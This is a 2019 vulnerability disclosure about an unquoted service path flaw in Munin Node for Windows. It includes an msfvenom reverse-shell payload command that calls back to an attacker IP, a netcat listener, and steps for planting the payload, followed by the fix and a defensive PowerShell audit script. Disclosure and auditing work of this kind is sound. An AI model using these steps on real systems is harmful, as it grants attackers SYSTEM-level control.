Security Vulnerability in Munin Node for Windows

0xNeel
Jul 14, 2019

According to the Munin home page, Munin is a monitoring tool that surveys all your computers and remembers what it saw. It presents all the information in graphs through a web interface. Its emphasis is on plug and play capabilities. After completing an installation, a high number of monitoring plugins will be playing with no more effort.

Using Munin you can easily monitor the performance of your computers, networks, SANs, applications, weather measurements and whatever comes to mind. It makes it easy to determine “what’s different today?” when a performance problem crops up. It makes it easy to see how you’re doing capacity-wise on any resources.

There are two ways to monitor Windows machines: one using munin-node for Windows, called “munin-node-win32”, and another using SNMP.

Munin-node-win32 can get you more info than SNMP will supply (namely system temperatures). You can get it at https://github.com/munin-monitoring/munin-node-win32. It works the same as the native munin-node program.

This is a Local Privilege Escalation vulnerability that gives SYSTEM-level access to an attacker once they gain an initial foothold on the machine.

Vulnerability Exploited: Unquoted Service Path of service munin-node

Vulnerability Type: Privilege Escalation

Vulnerability Explanation: The value of BINARY_PATH_NAME for the munin-node service is not quoted. This could allow an attacker with local access to execute code with administrative privileges. More details on Unquoted Paths Local Privilege Escalation vulnerability can be found here.

Vulnerability Fix: When registering munin-node as a service, surround the complete binary path with double quotes.

Vulnerability tested on Windows 7 (32-bit)

Steps to reproduce:

Prerequisites:

  1. Munin-node-win32 is installed as a service (which is part of the default installation). (Must)
  2. The user (People User/Service User) is able to copy/create a file in the ‘C’ directory. (Must)
  3. The user can start/restart the service “Munin Node for Windows 1.6.0 (Beta)”. (Optional)

Note: All the following steps are performed on the munin node installed with default configurations.

Determine name, displayname of Munin node client service

Command: wmic service get name,displayname,startmode | findstr /i "munin"

Name of Munin's registered service is munin-node.

Print details of service “munin-node”

Command: sc qc munin-node

START_TYPE is 2 AUTO_START, so the service starts by default after a system restart/boot.
The BINARY_PATH_NAME value is vulnerable to path interception because the path has spaces and is not surrounded by quotation marks. An adversary can place an executable in a higher-level directory of the path, and Windows will resolve that executable instead of the intended one. So, an attacker can place a malicious payload at “C:\Program” or “C:\Program Files\Munin”, and it will be run instead of the intended program.

Generate reverse shell payload on attacker machine (Kali)

Command: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.132 LPORT=443 -f exe --platform windows -o Munin

In the above command, replace the LHOST value with the attacker machine’s IP address.
Transfer the file Munin (generated by the above command) to the target machine at “C:\Program Files\”.

Following snippet shows file is placed at C:\Program Files:

On the attacker machine, start a Netcat listener on port 443

Command: nc -nvlp 443

On the target machine, start/restart the service “Munin Node for Windows 1.6.0 (Beta)”

Note: If the user does not have permission to restart/start the service, the payload will be executed upon system reboot.

Reverse shell received at attacker machine with system level access

Upon service reboot, received SYSTEM-level access.
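
A defender-side audit for the condition that sc qc showed above, as an added example that is not part of the original post: it lists every local service whose executable path is unquoted and contains a space, together with the directories where file-creation rights should be restricted. The function names are hypothetical, and PowerShell 3.0 or later is assumed.

```powershell
# Added example, not from the original post. Assumes PowerShell 3.0 or later.

function Get-UnquotedExePath {
    # Returns the executable part of a service command line when it is
    # unquoted and contains a space; otherwise returns $null.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $cmd = $PathName.Trim()
    if ($cmd.StartsWith('"')) { return $null }    # already quoted
    # Shortest prefix ending in ".exe" followed by whitespace or end of line.
    # Command lines that do not name a .exe are skipped, not flagged.
    $m = [regex]::Match($cmd, '^(.+?\.exe)(?=\s|$)', 'IgnoreCase')
    if ($m.Success -and $m.Groups[1].Value.Contains(' ')) {
        return $m.Groups[1].Value
    }
    return $null
}

function Get-InterceptionDirs {
    # Each space in the unquoted path ends a prefix that Windows may try as a
    # program name. Returns the parent directory of every such prefix: the
    # folders where a non-administrator must not be able to create files.
    param([string]$ExePath)
    $parts = $ExePath -split ' '
    $dirs = for ($i = 0; $i -lt $parts.Count - 1; $i++) {
        Split-Path -Path ($parts[0..$i] -join ' ') -Parent
    }
    $dirs | Select-Object -Unique
}

# Audit every service registered on the local machine.
Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $exe = Get-UnquotedExePath $_.PathName
    if ($exe) {
        [pscustomobject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            RunsAs    = $_.StartName
            PathName  = $_.PathName
            CheckDirs = (Get-InterceptionDirs $exe) -join '; '
        }
    }
} | Format-List
```

For each service it reports, apply the fix described above by re-registering the service with its binary path in double quotes, and confirm that non-administrators cannot create files in the listed directories.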
